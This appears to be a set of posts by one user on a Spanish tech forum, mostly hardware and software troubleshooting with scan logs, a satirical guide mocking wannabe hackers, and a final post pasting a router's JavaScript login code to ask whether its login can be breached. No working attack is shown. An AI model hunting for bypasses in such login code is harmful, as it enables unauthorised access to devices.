Pues lo primero para eliminar un virus en el MBR es encontrarlo y estar seguros de que ese es el problema, yo recomiendo la aplicacion gratuita de Avast "aswMBR.exe" ya que tiene una interfaz sencilla y es muy potente, lo pueden descargar desde aqui http://public.avast.com/~gmerek/aswMBR.htm  después de descargarlo lo ejecutan,  al ejecutarlo por primera vez les preguntara si desean actualizar la base de datos, si disponen de una conexión a internet les recomiendo actualizar pues así sera mas seguro.
Cuando termine de actualizar les saldra algo como esto:


Hacemos clic en SCAN para que comience el análisis, al terminar el análisis tendremos  tres opciones, que son: FixMBR, Save Log y Exit. La primera vez que lo ejecutamos solo podemos RESTAURAR EL MBR y para ello hacemos click en FixMbr.


Posterior a esto reiniciamos el equipo y repetimos el proceso. Los archivos sospechosos aparecerán en rojo, y tenemos la opción de guardar un log para compartirlo en foros como este donde personas puedan ir sumando sus experiencias.

Saludos Familia.
#14
Muy buen día distinguidos miembros del foro.

Vengo aquí porque después de varios dias de sin dormir creo que es justo compartir mi problema con ustedes. Sucede que mi padre tiene un sistema de DVR-PC (Digital Video Recorder basado en PC) para el manejo de 16 cámaras de seguridad de un CCTV (Circuito cerrado). El mismo esta basado en un PC normal con las siguientes características:

Windows XP Profesional SP3
Procesador Intel P4 2.4 Ghz
1.5 GB RAM
Tarjeta de video Ati Radeon 9000
Utiliza Una tarjeta capturadora de vídeo de 16 canales similar a esta:



Y utiliza un software llamado "M-series" del cual no encuentro absolutamente nada en internet, ni en la pagina del creador de los drivers. Ok, hasta ahora solo he dado descripciones, aquí viene el problema:

Hace 5 dias el equipo se apago y no quiso encender, entonces mi padre me llamo para que le tirara un ojo. Pues en mis observaciónes note el Power Supply un poco defectuoso (voltage de salida fuera de los valores normales) por lo que decidimos comprar otra fuente de alimentación, luego de cambiar la fuente de alimentación por otra de la misma capacidad (450w) me di cuenta de que el motherboard no hacia nada, estaba muerto. Al parecer se había quemado por algún pico de voltaje, entonces compramos un otro motherboard de repuesto.

En fin, después de instalar Board nuevo y power supply nuevo todo funciono normal, le hice un memtest a los módulos de memoria y un chkdisk al disco duro los cuales resultaron en buen estado. Posterior a esto instale windows XP, sus respectivos drivers etc. Todo desde CD´s. Luego instale la aplicacion que se usa para el monitoreo de las cámaras y hasta ahi todo bien. El problema esta cuando intento iniciar la aplicación la computadora se reinicia bruscamente.

Le he formateado el disco con Gparted desde una distro linux. (Varias veces)
Le he reinstalado windows (varias veces).
Le pase antivirus AVAST actualizado en busca de basura.
Le pase el antivirus al MBR (MasterBootRecord) ya que muchos virus se esconden en este sitio.
Le cambie el disco duro y le instale desde cero.
Le hice Memtest a los módulos de memoria.
Probé quitando la tarjeta PCI DVR y de todas formas cuando quiero ejecutar la aplicación se reinicia.

Este mismo programa que me da problemas esta instalado en otro equipo y funciona normal. (Fue instalado con el mismo CD)

Aquí les dejo el "Log" del antivirus por si le quieren echar un ojo:
aswMBR version 0.9.9.1665 Copyright(c) 2011 AVAST Software
Run date: 2012-10-22 08:57:36
-----------------------------
08:57:36.078    OS Version: Windows 5.1.2600 Service Pack 3
08:57:36.078    Number of processors: 1 586 0x207
08:57:36.078    ComputerName: COMPUTER-8511  UserName: Owner
08:57:36.468    Initialize success
08:57:40.593    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-4
08:57:40.609    Disk 0 Vendor: ST3120023A 3.33 Size: 114473MB BusType: 3
08:57:40.625    Disk 0 MBR read successfully
08:57:40.625    Disk 0 MBR scan
08:57:40.640    Disk 0 Windows XP default MBR code
08:57:40.656    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS       114463 MB offset 63
08:57:40.656    Disk 0 scanning sectors +234420480
08:57:40.734    Disk 0 scanning C:\WINDOWS\system32\drivers
08:57:46.390    Service scanning
08:58:07.125    Modules scanning
08:58:20.406    Disk 0 trace - called modules:
08:58:20.437    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll atapi.sys pciide.sys PCIIDEX.SYS
08:58:20.453    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x89899ab8]
08:58:20.468    3 CLASSPNP.SYS[f7637fd7] -> nt!IofCallDriver -> \Device\00000056[0x89807f18]
08:58:20.484    5 ACPI.sys[f75ae620] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-4[0x897a2b00]
08:58:20.500    Scan finished successfully
08:58:52.921    Disk 0 MBR has been saved successfully to "C:\Documents and Settings\Owner\Desktop\AVAST\MBR.dat"
08:58:52.937    The log file has been saved successfully to "C:\Documents and Settings\Owner\Desktop\AVAST\aswMBR.txt"



Aquí les dejo un Hitjackthis que hice para que lo miren:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 08:56:57 a.m., on 22/10/2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\system32\taskswitch.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre7\bin\jqs.exe
C:\Program Files\UPHClean\uphclean.exe
C:\Documents and Settings\Owner\Desktop\HJT\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.zone54.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Program Files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [CoolSwitch] C:\WINDOWS\system32\taskswitch.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [_nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O4 - Global Startup: Microsoft .NET Framework v4 - Slow Windows XP Boot Fix.vbs
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O13 - Gopher Prefix:
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: User Profile Hive Cleanup (UPHClean) - Windows (R) Codename Longhorn DDK provider - C:\Program Files\UPHClean\uphclean.exe

--
End of file - 4185 bytes


Gracias de antemano hermanos, espero cualquier sugerencia por parte de ustedes.

PD. Si el tema esta en el lugar equivocado por favor moverlo Carlos, lo puse aqui pues como trata de hardware, software, windows, etc.. No sabia donde ponerlo.

#15
Buenas noches gente...

Pues el caso es el siguiente, hace un tiempo una amiga instalo una academia de formación artística (Canto, expresión corporal, teatro etc..) Y yo, como buen amigo que soy me ofreci a darle una mano en todo el tema de informática y sistemas para su academia. En ese entonces le instale una pequeña red LAN con cuatro equipos y una impresora compartida, de los equipos dos de ellos usan XP SP3, y los demás OSX Leopard (Imac4). Todo ha venido funcionando normalmente. El asunto es que la academia ha tenido un crecimiento vertiginoso en apenas dos años y los antiguos métodos de llevar el control de los estudiantes, profesores, pagos, proveedores, padres, etc... ya no funcionan mas.

Asi que ella me ha requerido alguna aplicación comercial para poder llevar el control de manera mas eficaz. He pensado en construir una desde cero lo cual me llevaría mas tiempo del que realmente tengo, también he pensado en comprar una aplicación de gestión comercial e implementarla de mi cuenta. Pero aquí llega el gran problema, no tengo idea de como implementar un sistema de esa clase en dos sistemas operativos tan diferentes y con tantas incidencias de compatibilidad.

Puede alguien darme una idea?

Gracias de antemano gente.

(Carlos si consideras que no estoy en la sección indicada te pido por favor lo muevas al apartado correspondiente)
#16
Buenos dias gente,

Sucede que tengo un disco duro externo Seagate FreeAgent de 320 GB, el cual es el mismo de la foto que dejo mas abajo:


Me lo regalo una amiga por san Valentin, así que los primeros días funciono perfectamente y después sin mas ni mas, la laptop no me lo reconoce como disco de almacenamiento, simplemente me lo muestra como "INITIO COMBO DEVICE CLASS", es decir el sistema no le asigna letra, no puedo verlo, ni nada...

Ya intente asignarle la letra manualmente por Inicio-------Equipo---------(click derecho) Administrar------Dispositivos de almacenamiento. Pero no apaece ni nada.

El disco tiene unas luces led que funcionan normalmente, pero es lo unico que funciona.

La laptop es una HP pavillon dv2000, corriendo windows 7 Ultimate.

Gracias de antemano gente.
#17
Buenas gente,

Pues tal y como reza el titulo desde hace unos dias hacia aca me encuentro imposibilitado para actualizar mi AV, cuando lo abro me sale este boton:



Hasta ahi todo bien, entonces cuando clickeo sobre el boton de actualizar arranca esto:



Y aqui viene el gran final:



Tengo un portatil HP Pavillon DV2000 corriendo windows seven home premium, alguna idea muchachos?
#18
Buenas gente,

Pues mi duda es la siguiente, tengo un disco duro SATA 3.5 dentro de un enclosure del que he perdido la fuente de alimentacion, el enclosure alimenta el disco duro por medio de 4 pines los cuales estan en este orden:

[1]   [2]   [3]     [4]

Mi duda es saber cuales son los dos valores de voltaje que normalmente  se envian por esos pines para de esa forma yo ingeniarmelas en darle power a mi enclosure, gracias de antemano y si necesitan alguna informacon extra me avisan por aqui.

Saludos a todos.
#19
Antes que nada aclarar que este tremendo  manual de como hacerse un super mega hacker es propiedad de  "skapunky" lo reproduzco aqui con la intencion de que todos los nuevos usuarios del foro se lean esto antes de postear el famoso "Como me inicio en este mundo" recomendaciones que estan mas que interesantes.

Publicado por: skapunky
Aquí les hago una pequeño resumen de la guia del Haxor (el termino hacker está obsoleto)

1º. La decoración: La decoración es muy importante, debes añadir posters en tu habitación, sobre todo uno de matrix no puede faltar, los otros pueden ser de algún gurú (nunca bill gates) y sobre todo si tiene 0 y 1 mucho mejor.

2º El fondo de escritorio de tu ordenador: Obiamente, deberás ponerte un fondo de escritorio bien haxor, con colores oscuros, 0 y 1 de fondo y lo mas importante, algúna imágen ridícula de un tio con pasamontañas o una buena frase bien haxor para impresionar a los amiguetes cuando vengan a casa.

3º La vestimenta: No se debe confundir haxor con friki, así que de vestimenta lo mejor es simplemente una camiseta. Para elegir un buen modélo puedes buscar una con 0 o 1 o algúna con un buen codigo en C (mejor si el codigo nadie lo entiende y parece muy haxor).

4º Actitud en foros: Debes registrarte en todos los foros haxors que puedas, responder siempre y participar sobre todo aportando info de los últimos troyanos y crypters del momento. Un buen haxor no se da a conocer si no pone material interesante.

5º Actitud en foros II: Has de utilizar el vocabulario adecuado, nunca digas HAR ya que se dice troyano, siempre nombra la palabra "victima" cuando hables de tus víctimas, debe quedar claro que eres un super haxor y eres un ser superior.

6º Mito de la programación: Esto es un gran mito, el haxor no programa, siempre utiliza herramientas de terceros ya que si alguien las hace, para que gastar tiempo hacíendolas? Intenta aprender de todas formas un poco de "programación bacth" y si te ves con fuerzas algo de visual basic para cambiar códigos fuentes y presentar herramientas "Hechas por tí". Recuerda que aportar dá reputación.

7º Todos los demás son lammers: Como buen haxor, siempre has de decir a los demás que són unos lammers, además si juegas a juegos online, debes llamar a todo el mundo "noob" y si te banean amenazar diciendo que atacaras el servidor del juego porque tienes la IP.

8º Moviéndose en chats: En los chats hagas lo que hagas, si alguien te molesta siempre debes decir que tienes su IP y que puede empezar a temblar. Realmente no tendrás ni idea de que hacer, o incñuso no tendrás ni la IP pero siempre hay alguien que pica.

9º La herramienta del haxor "MSN": Aquí se va a centrar parte de tu gran actividad, es el sitio fundamental para encontrar lo comúnmente llamado como "víctimas", así que ya sabes, a engañar a la gente como un perro y a curiosear en sus ordenadores en busca de porno. También va bien para impresionar a las chicas y hacérles ver lo gran Haxor que eres."

10º La palabra hacker/haxor: Siento no mencionar antes éste detalle, como buen hacker que eres, el término hacker se te queda corto siempre, así que te debes llamar Haxor. Queda mas de chico malote y eso a las mujéres les pone.

11º Tu nick en internet: Es de suma importancia que tu nick contenga la palabra "hacker/haxor" o algún derivado de éstas. Debes mostrarte como una amenaza y que los usuarios te respéten. Que sepan quien eres!

12º Relaciónes sociales: Siempre debes decir a tus amistades lo gran haxor que eres, eso es importantísimo. Sobre todo hablárles de que puedes controlar ordenadores con programas muy haxors. También casi siempre funciona hablárles de algo my haxor aunque no tengas ni idea, vuelo a repetir que a las chicas estas cosas les impresiona mucho.

13º El gran secreto: Éste es el punto mas importánte, cuando estés en un foro o comunidad seria, no muestres tu gran lado de Haxor. Es importante que los mindunguis que no llegan ni a hackers te respeten y crean que tu nunca harías nada malo. Usa tus armas de haxor, pero nunca las muestres.

14º. El legado: Es importante que busques un pequeño saltamontes que aprenda de ti, y le debes enseñar todo lo que has aprendido en este manual para que algún dia sea un haxor de los buenos y se repita el ciclo. Lo mas importante es que cuando tengas aprendiz, te hagas el interesante y le cuentes tonterias de 0 y 1 aunque no sepas lo que le dices. Recuerda que quien no sabe del tema, cualquier cosa le impresiona.

15º La regla del antivírus: Debes ser como Chuck Norris, tu ordenador no debe tener antivirus porque cuando éstos te conózcan se suicíden. Es importante decir que no usas ningún sistema de protección porque no crees en los antivírus.

16º Mentiras piadosas: Ésta es otra parte importantísima, dí siempre que has accedido a muchas webs (siempre va bien decir que algúna del gobierno), si te preguntan como lo hicíste dí siempre que son secretos oscuros que se deben de guardar.

#20
Muy buenas...

Hola a todos espero estén bien, pues basicamente mi problema es que recien compre un tv plasma (especificamente Viera Panasonic TC-P42X3X) y el mismo como la gran mayoria de los plasmas y LCD´s tiene puertos USB para reproducir medios desde ahi ya sean fotos, videos ó musica. El problema viene en que solo reproduce videos en MP4, WMV y MKV. Asi pues que me he dedicado a bajar solo peliculas en estos formatos y cual es mi sorpresa al darme cuenta de que algunas peliculas las reproduce sin audio, leyendo el manual me dice que solo soporta codec de audio MP3/AC-3/LPCM. Y aqui es mi ruptura  :huh:

Suponiendo que mi película formato MP4 tenga una pista de vídeo en AVC (lo cual es perfectamente compatible) y una pista de audio en AAC..

COMO CONSIGO CAMBIAR EL FORMATO DE LA PISTA DE AUDIO POR UNO COMPATIBLE CON MI TV (MP3/AC-3/LPCM)..?

Gracias de antemano a todos y saludos cordiales.
#21
Foro Libre / Documental Hackers.
4 Noviembre 2011, 04:03 AM
Wenas..


Hola gente, pues sucede que me he bajado un documental sobre hacking y quiero compartirlos con ustedes, aclaro que aun no lo he visto pues me falta un 6% pero aquí les dejos el link por si se animan a descargarlo, solo pesa 128 Mb
Saludos por allá.

http://www.megaupload.com/?d=TRARE4D2

Saludos por allá.
#22
Java / Codigo JS en router ClearAcess, vulnerable?
7 Septiembre 2011, 05:26 AM
Pues wenas gente..

Sucede que me han instalado un router wireless marca ClearAcces y para entrar a su configuracion (obvio despues de estar conectado) es necesario digitar usuario y pass los cuales son el numero serial que viene en la caja del router. Mi pregunta es la siguiente, es posible vulnerar el sistema del login (que esta hecho en JS) aprovechando alguna brecha en el codigo.

Se muy poco o casi nada de JS (solo lo suficiente para superar el reto de zona cero, jejej) por eso pegare aqui el codigo para que todos les hechen un ojo y me digan si hallan algun hueco por donde vulnerar.

/*
REQUIRES:
prototype
jQuery
Gateway
SubscriberAttribute
SubscriberLogin
SubscriberLoginReset
SubscriberLoginSession
SubscriberManagementGroups
Cookies
Branding
*/

jQuery(document).ready(function() {

    // position the ISP's logo the hard way because CSS can't handle it.
    function alignISPLogo() {
        var logoWidth = $j("#isplogo IMG").width();
        var hPos = logoWidth > $j("#isplogo").width() ? "left" : "center";
        var vPos = ((80 - $j("#isplogo IMG").height()) / 2) + "px";
        $j("#isplogo").css("background-position", hPos + " " + vPos);
        if (logoWidth > 230) {
            //
            $j("#login").css("margin-top", "80px");
            $j("#isplogo").width("598px");
        }
        $j("#isplogo IMG").remove();
    }

    $j("#isplogo IMG").load(alignISPLogo);
    if ($j("#isplogo IMG").height()) alignISPLogo();

    CA.CP.Cookies.clearAll();

    var skipSync = false;
    // http://en.wikipedia.org/wiki/Konami_Code
    // alert([38,40,38,40,37,39,37,39,66,65].inject(0, function (a,c) { return (a * 733 + c) & 0xFFFFFFFF; }));
    var skipSyncSequenceHash = 1947954279;
    var skipSyncSequenceLength = 10;

    function setSkipSync() {
        var lastChars = [];
        return function(ev) {
            lastChars.push(ev.keyCode);
            if (lastChars.length > skipSyncSequenceLength) lastChars.splice(0, 1);
            if (lastChars.length == skipSyncSequenceLength &&
                    skipSyncSequenceHash == lastChars.inject(0, function (a, c) {
                        return (a * 733 + c) & 0xFFFFFFFF;
                    })) {
                skipSync = !skipSync;
                $j("#skipSyncDisplay")[skipSync ? "show" : "hide"](true);
            }
        };
    }

    $j(document).keydown(setSkipSync());

    function log() {
        if (typeof console != 'object') return;
        if (typeof console.log != 'function') return;
        if (Prototype.Browser.Gecko || Prototype.Browser.WebKit) {
            console.log.apply(console, arguments);
        }
    }

    Object.extend(CA.CP.ErrorHandlers, {
        ligthbox: null,
        showError: function (options) {
            options = options || {};
            var box = $j("#errorMessageBox");
            box.find(".title").text(options.title || "Error"),
                    box.find(".heading").text(options.heading);
            box.find(".message").text(options.message);
            var opts = {};
            var lightbox = null;
            if (options.autoClose) {
                opts.close = function() {
                    ligthbox = null;
                };
                window.setTimeout(function () {
                    if (lightbox) lightbox.close();
                }, 5000);
            }
            lightbox = CA.CP.modalWindow(box, opts);
            this.lightbox = lightbox;
            $j("#closeErrorMessageBoxButton").unbind("click").click(function () {
                this.close();
            }.bind(this));
        },
        close: function () {
            this.lightbox.close();
            this.lightbox = null;
        },
        pageError: function (obj) {
            this.showError({
                heading:CA.CP.getResource("Password.loginErrorHeading.label"),
                message:CA.CP.getResource("Password.loginErrorMessage.label")
            });
            log(obj.statusText + "\n[HTTP Error " + obj.status + "]\n" + obj.thrownError);
        },
        clientError: function (obj) {
            this.showError({
                heading:CA.CP.getResource("Password.clientErrorHeading.label"),
                message:CA.CP.getResource("Password.clientErrorMessage.label")
            });
            log(obj.statusText + "\n[HTTP Error " + obj.status + "]");
        },
        communicationError: function () {
            this.showError({
                title:CA.CP.getResource("Password.communicationErrorTitle.label"),
                heading:CA.CP.getResource("Password.communicationErrorHeading.label"),
                message:CA.CP.getResource("Password.communicationErrorMessage.label")
            });
            log("Server connection error");
        },
        serverError: function (obj) {
            this.showError({
                title:CA.CP.getResource("Password.communicationErrorTitle.label"),
                heading:CA.CP.getResource("Password.serverErrorHeading.label"),
                message:CA.CP.getResource("Password.serverErrorMessage.label")
            });
            log(obj.statusText + "\n[HTTP Error " + obj.status + "]");
        }
    });

    var newPasswordValidator = new CA.ui.LengthValidator("#passwordEntryValidator", "#passwordEntry", {min:5,max:-1});

    function PasswordChange() {
        this.lightbox = null;
    }

    Object.extend(PasswordChange.prototype, {
        show: function() {
            var box = $j("#changePasswordBox");
            var submitPasswordChange = this.changePassword.bind(this);
            $j("#changePasswordButton").unbind("click").click(submitPasswordChange);
            $j("INPUT#passwordEntry, INPUT.confirm", box).unbind("keydown").keydown(invokeOnEnter.curry(submitPasswordChange)).val("");
            this.sessionId = CA.CP.Cookies.sessionId(); // store the session id
            CA.CP.Cookies.sessionId(null); // prevent the session from being valid
            this.lightbox = CA.CP.modalWindow(box);
            newPasswordValidator.validate();
            $j(".confirm", box).keyup();
        },

        changePassword: function() {
            var box = $j("#changePasswordBox");
            var newPassword = box.find("#passwordEntry").val();
            var confirmPassword = box.find("input.confirm").val();

            if (!newPasswordValidator.isValid()) return false;

            if (newPassword == confirmPassword) {
                var service = new CA.CP.SubscriberLogin(CA.CP.Cookies.subscriberId());
                CA.CP.Cookies.sessionId(this.sessionId); // set the session id for the request
                service.changePassword(loginForm.find(".password").val(), newPassword, {
                    complete: function(xhr) {
                        if (xhr.status < 300) {
                            passwordChangeRequired = false;
                            loginForm.find(".password").val(newPassword);
                            submit();
                            this.lightbox.close();
                        } else {
                            CA.CP.Cookies.sessionId(null); // prevent the session from being valid
                        }
                    }.bind(this),
                    on403: function() {
                        this.lightbox.close();
                        showInvalidPassword();
                    }.bind(this)
                });
            }
            return false;
        }
    });

    function ForgotPassword() {
        this.lightbox = null;
        this.service = new CA.CP.SubscriberLoginReset();
    }

    Object.extend(ForgotPassword.prototype, {
        setVisible: function() {
            var box = $j("#forgotPasswordBox");
            var all = [".instructions", ".failed", ".success", ".input"];
            var show = $A(arguments);
            var hide = all.reject(function(a) {
                return show.include(a);
            });
            show.each(function(i) {
                box.find(i).show();
            });
            hide.each(function(i) {
                box.find(i).hide();
            });
        },

        show: function() {
            this.setVisible(".instructions", ".input");
            var box = $j("#forgotPasswordBox");
            $j("INPUT.email", box).unbind("keydown").keydown(invokeOnEnter.curry(this.resetPassword.bind(this)));
            $j("#resetPasswordButton", box).show().unbind("click").click(this.resetPassword.bind(this));
            $j("#resetPasswordContinueButton", box).hide().unbind("click").click(this.close.bind(this));
            this.lightbox = CA.CP.modalWindow(box);
        },

        showResetFailed: function(cause) {
            var box = $j("#forgotPasswordBox");
            box.find(".failed .cause").text(cause);
            this.setVisible(".failed");
            $j("#resetPasswordButton").hide();
            $j("#resetPasswordContinueButton").show();
        },

        showResetSuccess: function() {
            this.setVisible(".success");
            $j("#resetPasswordButton").hide();
            $j("#resetPasswordContinueButton").show();
        },

        resetPassword: function() {
            var box = $j("#forgotPasswordBox");
            var email = box.find(".email");
            this.service.reset(email.val(), {
                success: function() {
                    this.showResetSuccess();
                }.bind(this),
                on404: function() {
                    this.showResetFailed(CA.CP.getResource("Password.resetPasswordFailed.label") + " \"" + email.val() + "\"");
                }.bind(this)
            });
            return false;
        },

        close: function() {
            this.lightbox.close();
            this.lightbox = null;
        }
    });

    var passwordChange = new PasswordChange();
    var forgotPassword = new ForgotPassword();

    var subscriberLoginSessionService = new CA.CP.SubscriberLoginSession();
    var loginForm = $j("#form-login");
    var loginProblems = $j("#login-problems");
    var passwordChangeRequired = false;

    function invokeOnEnter(callback, e) {
        switch (e.keyCode) {
            case 13: //return
                callback();
                break;
        }
    }

    $j("#passwordEntry").attr("tabindex", "20");
    $j("INPUT.login", loginForm).keydown(invokeOnEnter.curry(submit)).keyup(clearSession).each(function () {
        this.focus();
    });
    $j("INPUT.password", loginForm).keydown(invokeOnEnter.curry(submit)).keyup(clearSession);
    $j("#submitButton", loginForm).click(function () {
        if (!$j("#submitButton", loginForm).hasClass("inactive")) submit();
    });
    $j("#selectDeviceButton", loginProblems).click(submit);
    $j("#cancelButton", loginProblems).click(function () {
        loginForm.find("#submitButton, #problemlink").removeClass("inactive");
        loginForm.find("INPUT").removeAttr("disabled");
        loginProblems.find(".devicesRow").hide();
    });

    $j("#problemlink").click(function() {
        if (!$j("#problemlink", loginForm).hasClass("inactive")) {
            log("forgot password");
            forgotPassword.show();
        }
    });

    function clearSession() {
        if (currentSession &&
                currentSession.sessionId &&
                ($j(".login", loginForm).val() != currentSession.$$username ||
                        $j(".password", loginForm).val() != currentSession.$$password)) {
            CA.CP.Cookies.clearAll();
            // remove the session
            new CA.CP.SubscriberLoginSession().logout(currentSession.sessionId, {
                suppressGeneralErrorHandling: true
            });
            currentSession = null;
        }
    }

    function submit() {
        log("submit called");
        if (okToContinue()) {
            if (skipSync)    CA.CP.Cookies.hasSynced(skipSync);
            window.location = window.location.href;
        } else {
            if (currentSession) {
                onAuthenticated(currentSession);
            } else {
                var login = $j(".login", loginForm).val();
                var password = $j(".password", loginForm).val();
                subscriberLoginSessionService.login(login, password, {
                    success: function(session) {
                        log(session);
                        passwordChangeRequired = session.expired;
                        onAuthenticated(session);
                    },
                    on401: function() {
                        showInvalidPassword();
                    }
                });
            }
        }
    }

    function showResetPassword(subscriberId) {
        log("password has expired");
        CA.CP.Cookies.subscriberId(subscriberId);
        passwordChange.show();
    }

    function showInvalidPassword() {
        CA.CP.ErrorHandlers.showError({
            title:CA.CP.getResource("Password.showInvalidPasswordTitle.label"),
            heading:CA.CP.getResource("Password.showInvalidPasswordHeading.label"),
            message:CA.CP.getResource("Password.showInvalidPasswordMessage.label"),
            autoClose: true
        });
        log("invalid username / password");
    }

    function showInvalidDevice() {
        CA.CP.ErrorHandlers.showError({
            title:CA.CP.getResource("Password.deviceError.label"),
            heading:CA.CP.getResource("Password.showInvalidDeviceHeading.label"),
            message:CA.CP.getResource("Password.showInvalidDeviceMessage.label")
        });
        log("device not found");
    }

    function showDeviceBelongsToAnotherSubscriber() {
        CA.CP.ErrorHandlers.showError({
            title:CA.CP.getResource("Password.showDeviceBelongsToAnotherSubscriberTitle.label"),
            heading:CA.CP.getResource("Password.showDeviceBelongsToAnotherSubscriberHeading.label"),
            message:CA.CP.getResource("Password.showDeviceBelongsToAnotherSubscriberMessage.label")
        });
        log("device belongs to a different subscriber");
    }

    function showSubscriberHasNoDevices() {
        CA.CP.ErrorHandlers.showError({
            title:CA.CP.getResource("Password.deviceError.label"),
            heading:CA.CP.getResource("Password.showSubscriberHasNoDevicesHeading.label"),
            message:CA.CP.getResource("Password.showSubscriberHasNoDevicesMessage.label")
        });
        log("the subscriber has no devices");
    }

    function showGeneralError(status, what) {
        CA.CP.ErrorHandlers.showError({
            heading:CA.CP.getResource("Password.showGeneralErrorHeading.label"),
            message:CA.CP.getResource("Password.showGeneralErrorMessage.label")
        });
        log(status, what);
    }

    function deviceId() {
        var deviceId = null;
        if (loginProblems.find(".devicesRow").is(":visible")) {
            log("using device id from drop down");
            deviceId = loginProblems.find(".devices").val();
        } else if (queryParameters.device) {
            log("using device id from query parameters");
            deviceId = queryParameters.device;
        } else {
            log("no device context");
        }
        return deviceId;
    }

    var currentSession = null;

    function onAuthenticated(session) {
        if (currentSession != session) {
            currentSession = session;
            currentSession.$$username = $j(".login", loginForm).val();
            currentSession.$$password = $j(".password", loginForm).val();
        }

        // set credentials
        CA.CP.Cookies.sessionId(session.sessionId);
        CA.CP.Cookies.subscriberId(session.subscriberId);

        log("session id: " + CA.CP.Cookies.sessionId());

        function withManagementGroups(subscriberId, allManagementGroups, f) {
            new CA.CP.SubscriberManagementGroups(subscriberId)[allManagementGroups ? 'get' : 'getControlPanelManagementGroups']({
                success: function(managementGroups) {
                    f(managementGroups);
                },
                error: function(xhr) {
                    showGeneralError(xhr.status, CA.CP.getResource("Password.withManagementGroupsGetError.label"));
                }
            });
        }

        function setDeviceAndSubmit(deviceId, managementGroupId) {
            CA.CP.Cookies.deviceId(deviceId);
            CA.CP.Cookies.managementGroupId(managementGroupId);
            if (passwordChangeRequired) {
                showResetPassword(session.subscriberId);
            } else {
                CA.CP.Cookies.sessionId(session.sessionId);

                if (CA.CP.Language.isLanguageSet()) {
                    var settingsSubscriber = new CA.CP.SubscriberAttribute(session.subscriberId);
